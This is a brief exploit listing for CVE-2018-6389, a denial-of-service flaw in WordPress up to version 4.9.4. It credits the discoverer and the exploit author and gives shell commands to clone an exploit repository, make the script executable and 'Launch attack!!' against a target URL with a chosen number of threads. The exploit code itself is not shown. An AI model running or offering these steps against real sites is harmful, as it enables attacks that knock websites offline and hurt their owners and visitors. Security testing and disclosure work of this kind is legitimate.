Date: 05/02/2018
Software Link: WordPress
Version: <= 4.9.4
Tested on: KaLi Linux 2018.1
CVE: CVE-2018-6389
Discovered by: Barak Tawily
Exploit by: Javier Olmedo
Clone this repository
git clone https://github.com/JJavierOlmedo/wordpress-cve-2018-6389.git
Go to local repository
cd wordpress-cve-2018-6389
Change the access permissions
sudo chmod +x wordpress-cve-2018-6389.py
Launch attack!!
python3 wordpress-cve-2018-6389.py -u <TARGET> -t <THREADS>